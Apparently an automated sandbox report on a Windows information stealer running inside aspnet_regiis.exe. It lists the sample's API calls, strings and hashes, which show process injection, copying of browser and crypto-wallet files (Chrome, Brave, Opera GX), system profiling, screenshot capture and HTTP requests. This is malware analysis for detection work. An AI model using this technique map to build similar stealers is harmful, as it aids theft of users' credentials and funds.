77471->77472 77473 41419c 77472->77473 77474 41058d lstrcpyA 77473->77474 77475 4141a4 77474->77475 77476 410609 3 API calls 77475->77476 77477 4141bc 77476->77477 77478 41058d lstrcpyA 77477->77478 77479 4141c4 77478->77479 78237 410d2e GetProcessHeap HeapAlloc GetTimeZoneInformation 77479->78237 77482 410609 3 API calls 77483 4141dd 77482->77483 77484 41058d lstrcpyA 77483->77484 77485 4141e5 77484->77485 77486 410609 3 API calls 77485->77486 77487 4141fd 77486->77487 77488 41058d lstrcpyA 77487->77488 77489 414205 77488->77489 77490 410609 3 API calls 77489->77490 77491 41421d 77490->77491 77492 41058d lstrcpyA 77491->77492 77493 414225 77492->77493 77494 410609 3 API calls 77493->77494 77495 41423d 77494->77495 77496 41058d lstrcpyA 77495->77496 77497 414245 77496->77497 78242 410f51 GetProcessHeap HeapAlloc RegOpenKeyExA 77497->78242 77499 414252 77500 410609 3 API calls 77499->77500 77501 41425e 77500->77501 77502 41058d lstrcpyA 77501->77502 77503 414266 77502->77503 77504 410609 3 API calls 77503->77504 77505 41427e 77504->77505 77506 41058d lstrcpyA 77505->77506 77507 414286 77506->77507 77508 410609 3 API calls 77507->77508 77509 41429e 77508->77509 77510 41058d lstrcpyA 77509->77510 77511 4142a6 77510->77511 78245 411007 77511->78245 77514 410609 3 API calls 77515 4142bf 77514->77515 77516 41058d lstrcpyA 77515->77516 77517 4142c7 77516->77517 77518 410609 3 API calls 77517->77518 77519 4142df 77518->77519 77520 41058d lstrcpyA 77519->77520 77521 4142e7 77520->77521 77522 410609 3 API calls 77521->77522 77523 4142ff 77522->77523 77524 41058d lstrcpyA 77523->77524 77525 414307 77524->77525 78262 410fba GetSystemInfo wsprintfA 77525->78262 77528 410609 3 API calls 77529 414320 77528->77529 77530 41058d lstrcpyA 77529->77530 77531 414328 77530->77531 77532 410609 3 API calls 77531->77532 77533 414340 77532->77533 77534 41058d lstrcpyA 77533->77534 77535 414348 77534->77535 77536 410609 3 API calls 77535->77536 77537 414360 77536->77537 77538 41058d lstrcpyA 

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                    • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                    • API String ID: 2238633743-2740034357
                                                                                                                                                                    • Opcode ID: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                                                                    • Instruction ID: 8261b1413bc3cc4e1081ef522fb3a36784379b70ccc82e73ae8bdeed84e113b8
                                                                                                                                                                    • Opcode Fuzzy Hash: 3e30b89850b8473fc7cede02b6692b6796462800fa081e8782096f790b2d890e
                                                                                                                                                                    • Instruction Fuzzy Hash: 7352F475910312AFEF1ADFA0FD188243BA7F718707F11A466E91582270E73B4A64EF19

                                                                                                                                                                    APIs
                                                                                                                                                                    • wsprintfA.USER32 ref: 00414D1C
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00414D33
                                                                                                                                                                    • _memset.LIBCMT ref: 00414D4F
                                                                                                                                                                    • _memset.LIBCMT ref: 00414D60
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
                                                                                                                                                                    • wsprintfA.USER32 ref: 00414DC2
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
                                                                                                                                                                    • wsprintfA.USER32 ref: 00414DFF
                                                                                                                                                                    • wsprintfA.USER32 ref: 00414E16
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • _memset.LIBCMT ref: 00414E28
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00414E3D
                                                                                                                                                                    • strtok_s.MSVCRT ref: 00414E82
                                                                                                                                                                    • _memset.LIBCMT ref: 00414E94
                                                                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 00414EA9
                                                                                                                                                                    • strtok_s.MSVCRT ref: 00414EC2
                                                                                                                                                                    • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414ED7
                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00436A28,0043661D), ref: 00414F90
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00414FA0
                                                                                                                                                                      • Part of subcall function 00412166: CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FB6
                                                                                                                                                                    • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00414FC1
                                                                                                                                                                    • strtok_s.MSVCRT ref: 00414FE7
                                                                                                                                                                    • FindNextFileA.KERNELBASE(?,?), ref: 00415105
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00415125
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                    • API String ID: 956187361-332874205
                                                                                                                                                                    • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                                                                    • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                                                                                                    • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                                                                    • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                                                                                      • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                      • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0EF
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040A1BE
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                                                                                    • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A41C
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                                                                                      • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                                                                                      • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                                                                                      • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                                                                                      • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A613
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                    • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                    • API String ID: 4173076446-1189830961

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C81F688,00001000), ref: 6C7935D5
                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7935E0
                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6C7935FD
                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C79363F
                                                                                                                                                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C79369F
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C7936E4
                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C793773
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F688), ref: 6C79377E
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C7937BD
                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C7937C4
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C81F688), ref: 6C7937CB
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C81F688), ref: 6C793801
                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C793883
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C793902
                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C793918
                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C79394C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3402785272.000000006C791000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C790000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c790000_aspnet_regiis.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                    • API String ID: 301339242-3790311718

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                    • API String ID: 2178766154-445461498
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                                                                    • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                                                                      • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                                                                      • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                                                                      • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                                                                      • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                                                                                      • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                                                                      • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                                                                                    • wsprintfA.USER32 ref: 00411949
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$AllocCreateFreeHeapInitializeInstanceTimeVariant$BlanketClearFileH_prolog3_catchH_prolog3_catch_InitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
                                                                                                                                                                    • String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$Unknown$Unknown$WQL
                                                                                                                                                                    • API String ID: 2280294774-461178377
                                                                                                                                                                    • Opcode ID: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                                                                    • Instruction ID: 9b83a2dca4a1b3c6c0afd6b9e082c19a49acb0dc1fc89349d09b2b61b6485616
                                                                                                                                                                    • Opcode Fuzzy Hash: fe6b9a04deeaae94ce61e149b8f4aed9b6b3574a86b373e3e1773863a37c8a56
                                                                                                                                                                    • Instruction Fuzzy Hash: F7418D71940209BBCB20CBD5DC89EEFBBBDEFC9B11F20411AF611A6190D7799941CB28
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: /$UT
                                                                                                                                                                    • API String ID: 0-1626504983
                                                                                                                                                                    • Opcode ID: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                                    • Instruction ID: 63eef66cd8fe0e336db70064ed11a5ad7b696d25642cb4984019eb1642be8bef
                                                                                                                                                                    • Opcode Fuzzy Hash: 94b155d6eae385495534a97f883fd4c918c0e8828a42b8e7b6cfe56aff5eeafa
                                                                                                                                                                    • Instruction Fuzzy Hash: 8E027DB19442698BDF21DF64CC807EEBBB5AF45304F0440EAD948AB242D7389EC5CF99
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 00406B40
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406B50
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406B5C
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00406B68
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                    • String ID: ERROR$ERROR$GET
                                                                                                                                                                    • API String ID: 3863758870-2509457195
                                                                                                                                                                    • Opcode ID: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                                    • Instruction ID: 58d07afc169a1ce0b47171bb7ce7cc0903f1f08f96176c9b1f2a19a3da15bd67
                                                                                                                                                                    • Opcode Fuzzy Hash: 79b04129377c5d4d45bac19231039a55e3dc9a9d221fd602966d56bbc965de8a
                                                                                                                                                                    • Instruction Fuzzy Hash: 9D51AEB1A00269AFDF20EB60DC84AEEB7B9FB04304F0181B6F549B2190DA755EC59F94
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00411FA4
                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00411FB1
                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00411FB8
                                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
                                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00411FDE
                                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
                                                                                                                                                                    • GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
                                                                                                                                                                    • GlobalLock.KERNEL32(?), ref: 00412052
                                                                                                                                                                    • GlobalSize.KERNEL32(?), ref: 0041205E
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
                                                                                                                                                                      • Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
                                                                                                                                                                      • Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA
                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 004120BC
                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004120D7
                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004120E0
                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 004120E8
                                                                                                                                                                    • CloseWindow.USER32(00000000), ref: 004120EF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2610876673-0
                                                                                                                                                                    • Opcode ID: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                                                                    • Instruction ID: f6e3f0428e96004f8b83f7710fafbd9962f3d673da3a1d35a18d8dcfea6c860f
                                                                                                                                                                    • Opcode Fuzzy Hash: bda296b1393527d1300f5fae4d52867722602398b487228bc4e84d997ee74abd
                                                                                                                                                                    • Instruction Fuzzy Hash: 0251EA72800218AFDF15EFA1ED498EE7FBAFF08319F045525F901E2120E7369A55DB61
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,0043A9AC,0043A9B0,004369FA,004369F7,00417908,?,00000000), ref: 00401FA4
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0043A9B4), ref: 00401FD7
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0043A9B8), ref: 00401FF1
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,0043A9BC,0043A9C0,?,0043A9C4,004369FB), ref: 004020DD
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3
                                                                                                                                                                      • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00402336
                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 004023A2
                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 004023B6
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC
                                                                                                                                                                      • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                                                                      • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                                                                      • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                                                                      • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                                                                      • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040264F
                                                                                                                                                                      • Part of subcall function 00416E97: Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
